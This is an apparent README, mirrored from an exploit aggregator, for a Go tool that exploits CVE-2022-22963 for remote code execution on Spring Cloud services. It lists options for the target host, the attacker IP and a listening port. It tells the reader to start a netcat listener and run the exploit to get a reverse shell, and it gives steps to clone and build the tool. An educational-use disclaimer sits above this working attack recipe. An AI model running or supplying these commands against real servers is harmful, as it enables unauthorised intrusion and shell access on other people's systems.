## https://sploitus.com/exploit?id=E00EE482-CF1E-5781-9A57-928FFA18D762
# CVE-2022-22963
Remote Code Execution exploiting CVE-2022-22963 attacking Spring Cloud service.
**Disclamier: This is for educational purposes only. The author is not responsible for the use of this program. Use under your own risk**
## Usage
```sh
./CVE-2022-22963 -h
Usage:
CVE-2022-22963 [OPTIONS]
Application Options:
-u, --target-url= Target/Host url where 'Spring Cloud' is running. Example: -t http://somesite.htb
-p, --target-port= Port running the service. Example: -p 8080
-i, --attacker-ip= Attacker IPv4 Address. Example: -i 10.10.10.10
-l, --listening-port= Listening port to connect. Example: -l 1337
Help Options:
-h, --help Show this help message
```
Assume a possible vulnerable target is running at `http://somerandomserver.com:8080`. Start `nc` listening on the port `1337`, so we run `nc -lvnp 1337`. Then, run the script/exploit:
```sh
./CVE-2022-22963 -u http://somerandomserver.com -p 8080 -i 10.10.10.10 -l 1337
```
## Build from source
If you have `go` installed in your machine, just do:
```sh
git clone https://github.com/GunZF0x/CVE-2022-22963.git
cd CVE-2022-22963
go run main.go -h #run without compiling any file
go build -o exploit main.go #build the file
```